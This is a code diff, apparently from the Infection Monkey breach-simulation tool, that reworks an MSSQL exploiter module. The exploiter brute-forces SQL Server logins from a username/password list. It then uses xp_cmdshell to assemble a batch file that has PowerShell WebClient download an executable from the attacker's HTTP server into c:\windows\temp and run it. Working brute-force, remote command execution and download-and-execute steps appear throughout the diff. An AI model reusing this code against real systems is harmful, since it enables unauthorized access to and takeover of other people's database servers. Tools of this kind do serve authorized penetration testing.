Monkey gets uploaded

monkey/infection_monkey/exploit/mssqlexec.py

@@ -1,13 +1,12 @@
 import os
 import logging
-
+from time import sleep
 import pymssql
 
 from infection_monkey.exploit import HostExploiter, mssqlexec_utils, tools
 from common.utils.exploit_enum import ExploitType
 from infection_monkey.exploit.tools import HTTPTools
 from infection_monkey.config import WormConfiguration
-from infection_monkey.model import RDP_CMDLINE_HTTP
 
 
 __author__ = 'Maor Rayzin'
@@ -55,14 +54,22 @@ class MSSQLExploiter(HostExploiter):
 
         if not self.create_payload_file(payload_path):
             return False
-        if self.brute_force_begin(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list,
-                                  payload_path):
-            LOG.debug("Bruteforce was a success on host: {0}".format(self.host.ip_addr))
-            return True
-        else:
+        cursor = self.brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, username_passwords_pairs_list)
+        if not cursor:
             LOG.error("Bruteforce process failed on host: {0}".format(self.host.ip_addr))
             return False
 
+    def execute_command(self, cursor, cmds):
+        try:
+            # Running the cmd on remote host
+            for cmd in cmds:
+                cursor.execute(cmd)
+                sleep(0.5)
+        except Exception as e:
+            LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
+            return False
+        return True
+
     def handle_payload(self, cursor, payload):
         """
             Handles the process of payload sending and execution, prepares the attack and details.
@@ -93,15 +100,15 @@ class MSSQLExploiter(HostExploiter):
         # TODO choose bit version
         dst_path = WormConfiguration.dropper_target_path_win_64
         dst_path = "c:\\windows\\temp\\monkey64.exe"
-
-        command = RDP_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': dst_path}
         LOG.info("Started http server on %s", http_path)
         tmp_file_path = "c:\\windows\\temp\\monkey_tmp.bat"
-        commands = [r"xp_cmdshell 'echo powershell (new-object System.Net.WebClient).DownloadFile(\" > %s'" % tmp_file_path]
-        commands2 = [r"xp_cmdshell 'echo powershell >> c:\\windows\\temp\\temp.bat'"]
+        commands = ["xp_cmdshell \"<nul set /p=powershell (new-object System.Net.WebClient).DownloadFile>%s\"" % tmp_file_path,
+                    "xp_cmdshell \"<nul set /p=(^\'%s^\' >>%s\"" % (http_path, tmp_file_path),
+                    "xp_cmdshell \"<nul set /p=, ^\'%s^\') >>%s\"" % (dst_path, tmp_file_path)]
+        chosen_attack.execute_command(commands)
+        commands2 = ["exec xp_cmdshell \"%s\"" % tmp_file_path]
         chosen_attack.execute_command(commands2)
 
-
         if chosen_attack.send_payload():
             LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
             if chosen_attack.execute_payload():
@@ -116,7 +123,7 @@ class MSSQLExploiter(HostExploiter):
         chosen_attack.cleanup_files()
         return False
 
-    def brute_force_begin(self, host, port, users_passwords_pairs_list, payload):
+    def brute_force(self, host, port, users_passwords_pairs_list):
         """
             Starts the brute force connection attempts and if needed then init the payload process.
             Main loop starts here.
@@ -124,7 +131,6 @@ class MSSQLExploiter(HostExploiter):
             Args:
                 host (str): Host ip address
                 port (str): Tcp port that the host listens to
-                payload (str): Local path to the payload
                 users_passwords_pairs_list (list): a list of users and passwords pairs to bruteforce with
 
             Return:
@@ -141,15 +147,7 @@ class MSSQLExploiter(HostExploiter):
                          'using user: {1}, password: {2}'.format(host, user, password))
                 self.report_login_attempt(True, user, password)
                 cursor = conn.cursor()
-
-                # Handles the payload and return True or False
-                if self.handle_payload(cursor, payload):
-                    LOG.debug("Successfully sent and executed payload: {0} on host: {1}".format(payload, host))
-                    return True
-                else:
-                    LOG.warning("user: {0} and password: {1}, "
-                                "was able to connect to host: {2} but couldn't handle payload: {3}"
-                                .format(user, password, host, payload))
+                return cursor
             except pymssql.OperationalError:
                 # Combo didn't work, hopping to the next one
                 pass

monkey/infection_monkey/exploit/mssqlexec_utils.py

@@ -108,28 +108,8 @@ class CmdShellAttack(AttackHost):
         self.attacker_ip = get_interface_to_target(host.ip_addr)
         self.host = host
 
-    def execute_command(self, cmds):
-        ftp_server, ftp_server_p = self.__init_ftp_server(self.host)
-        if ftp_server_p and ftp_server:
-            #command = "xp_cmdshell \""+cmd+"\""
-            #command = "xp_cmdshell \"C:\\download.bat\""
-            #command = "EXEC xp_cmdshell \"c:\\download.bat\""
 
 
-            try:
-                # Running the cmd on remote host
-                for cmd in cmds:
-                    self.cursor.execute(cmd)
-                    sleep(0.5)
-            except Exception as e:
-                LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
-                self.ftp_server_p.terminate()
-                return False
-            return True
-        else:
-            LOG.error("Couldn't establish an FTP server for the dropout")
-            return False
-
     def send_payload(self):
         """
             Sets up an FTP server and using it to download the payload to the remote host